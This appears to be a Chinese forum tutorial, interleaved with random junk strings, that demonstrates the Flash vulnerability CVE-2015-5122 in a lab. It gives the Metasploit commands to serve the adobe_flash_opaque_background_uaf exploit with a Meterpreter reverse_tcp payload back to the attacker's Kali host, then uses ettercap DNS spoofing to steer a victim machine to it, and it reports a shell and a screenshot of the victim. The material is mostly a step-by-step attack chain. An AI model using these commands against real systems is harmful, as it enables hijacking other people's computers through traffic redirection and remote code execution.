|
: F$ B1 Q! Q; w# f) J4 V
二、cve2015-5122漏洞实例演示虚拟机 # L8 h4 m F/ A+ g
; P1 o# G, \7 I) f1 f5 P+ J
6 ~- K) X( b: V 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ; ~) Q: y2 P, C! M
2 n8 U7 Y1 Y/ j; `" O9 [+ R E
/ p7 t3 j4 p% K% a1 ?. @* ~
search cve-2015-5122如图: * i1 ~% f0 }$ W: O2 ?# N
' U* `& m7 c6 r" t5 c. T0 l9 g
* r8 [4 n1 W8 H1 Q. D7 k
; H- {( k, d& X! O! z : Y8 z( M# e# G* _: d: X- H9 n
' [9 H) K2 T A; b* R( J/ L 下面我们敲如下命令: / `1 F, c y# r! y- S: Z# k
. V, n, V3 u* Q5 G" l" t
. K k/ k; l$ E( G$ [, v use exploit/multi/browser/adobe_flash_opaque_background_uaf $ I; n5 H. J% H( [& n
F- N% o% R9 j: o9 I
) w+ @5 h Y4 @+ ^$ V! Q; ^ set PAYLOAD windows/meterpreter/reverse_tcp
3 @; y; D/ ?$ u! ?7 n( ~7 d 3 v! ~: }6 I$ ^& G/ h+ a4 r3 [
" ~' V7 n" g( [ u8 l8 d
set LHOST 192.168.0.109 ' d8 x0 T: N, z5 Q l, W
, ]1 M+ D8 m! J8 F& d; R* W+ B8 ?1 F K& I4 t, O, |; u3 R, h$ ^
set URIPATH / /*根目录*/ + ~$ b0 z/ o- u
( A( A. w: B1 @/ F
- E$ J: Z# L% h$ m# r% s8 K) P/ d
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
0 s) x% z+ ^- ^ 9 W8 f8 P9 @' r3 ^1 i+ _
) G7 x V& L5 |) d; Y set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
0 a7 t# Y0 h% ~/ o + t+ H, v" f9 |! d# p8 b4 n
3 a5 h# c4 F- |$ q& H# B
然后show options如图:
0 n7 n4 |: l, U; B4 K, K' Y0 |
c4 w6 | I# ~* z2 j9 b7 P- l, |" m* k' @
( X5 V; ^% I3 D, B' h: K
; f. G0 g" D5 s! p( w! q4 B
- J9 }2 N0 z/ L2 _2 b 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
4 P7 I) _0 E/ Z' \) P
+ U/ M5 v3 Q+ ^' V* o, ?* `- J8 a
. r* d2 `/ Y4 D2 e/ U% C$ b/ u# n: u- [+ S; W4 m
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 / o+ Z; _5 Y- m& B& j$ P8 d
9 J8 L4 a, B3 Q, B4 \/ _! X8 f4 e
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
v/ j# t6 D3 H* _, T, s& _ 7 D; m' @% s! a2 G
8 S6 ?" g5 D. D e
. K X1 v! t& o. ?) g 8 \+ x! |) h% c# X/ x! |' V
) ^$ O# I4 l* f0 ^
成功了,这时候我们断开ettercap,如图: 4 u. ?0 [ i2 D
' ^# k4 {% P4 C- o7 m6 W# Y, ~/ }4 U C [
/ G5 m+ c+ l* |& V/ ~2 k Y; G F" W8 W% D
! U1 ?, w& K7 X: z2 c" H* j, Q: ]1 A
Screenshot如图: 1 ~1 d) P" B; M' T" i# c; H0 ?- ^
/ s) O! s1 P/ g
* A- O& z, s2 `: d % [! o4 y3 j, q* {8 Z" K
- P+ h7 t9 J6 p' N" r* b! e% {' S7 i3 M; k& m ?
% c9 [+ Q: g2 s, L7 U2 F. f
|